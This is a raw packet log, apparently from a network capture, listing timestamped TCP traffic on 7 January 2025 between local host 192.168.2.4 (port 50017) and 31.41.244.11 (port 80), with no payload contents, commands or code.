Jan 7, 2025 10:09:02.927593946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.927611113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927670002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927711964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.927804947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927850962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.927870035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927922964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.927928925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927941084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927953005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927982092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928025961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928057909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928070068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928086996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928098917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928108931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928143024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928143024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928158045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928178072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928205013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928283930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928294897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928306103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928317070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928327084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928337097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928349018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928364992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928364992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928411007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928564072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928575039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928585052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928595066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928611994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928622961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928632975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928633928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928647041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928658962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928659916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928659916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928673983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928680897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928692102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928699970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928704023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928715944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928726912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928744078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928755045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928759098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928759098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928765059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928776979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928782940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928795099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928807020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928817034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928822041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928833008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928843021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928848982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928848982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928853989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928867102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928879023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928889990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928900003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.928911924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928932905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.928945065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929090023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929100990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929111958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929122925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929135084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929145098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929150105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929157019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929167986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929188013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929188967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929188967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929199934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929205894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929210901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929219961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929228067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929233074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929244995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929255962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929263115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929263115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929267883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929280996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929286003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929291010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929296970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929299116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929300070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929362059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929362059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929491043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929502010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929512024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929522991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929547071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929558039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929568052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929573059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929574013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929579973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929589987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929593086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929604053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929615021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.929619074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.929663897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.956588984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956608057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956624985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956638098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956661940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.956700087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956712008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956722021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956723928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.956763983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.956779003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.956840038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956851959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956862926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956873894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956885099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956897020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956911087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.956924915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.956924915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.956947088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.959511995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.959531069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.959539890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.959564924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.959583998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.959594011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.959602118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.959613085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.959625006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.959649086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.959656000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.959661007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.959681034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.959718943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.959718943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.981412888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.981478930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.981488943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.981492043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.981501102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.981513023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.981524944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.981535912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.981542110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.981542110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.981583118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014096975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014112949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014123917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014144897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014156103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014195919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014195919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014202118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014214993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014229059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014271975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014271975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014314890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014327049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014337063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014348984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014365911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014375925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014415026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014416933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014430046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014440060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014451027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014481068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014514923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014544010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014554024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014564991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014576912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014588118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014604092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014638901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014638901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014681101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014692068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014703035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014714956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014727116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014755964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014755964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014794111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014805079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014816046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014817953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014827967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014837980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014848948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014875889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014898062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.014926910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014939070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014950991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014962912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014974117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.014977932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015017986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015182972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015193939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015208006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015224934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015235901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015245914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015247107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015260935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015269995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015279055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015297890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015305042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015321970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015331030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015333891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015346050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015357018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015367031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015368938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015379906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015391111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015418053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015418053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015431881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015440941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015482903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015542984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015554905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015564919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015579939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015590906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015599012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015600920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015614986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015625954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015625954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015666008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015683889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015713930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015789032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015805960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015816927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015827894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015836000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015836000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015837908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015851021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015860081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015862942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015877008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.015908003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015908003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.015935898 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.016114950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016127110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016139030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016149998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016160965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016172886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016175032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.016191006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016201973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016212940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016222954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.016227961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016239882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016242027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.016252041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016263962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016267061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.016273975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.016295910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.016338110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.043332100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043343067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043354034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043405056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.043412924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043426037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043437958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043448925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043457031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.043479919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.043495893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043508053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043519020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.043545961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043556929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043556929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.043572903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043607950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.043607950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.043692112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043703079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043714046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.043751001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.043765068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.046307087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.046317101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.046331882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.046344042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.046360016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.046370983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.046371937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.046408892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.046416998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.046416998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.046427011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.046459913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.046474934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.068298101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.068309069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.068320036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.068331003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.068341970 CET	80	50017	31.41.244.11	192.168.2.4
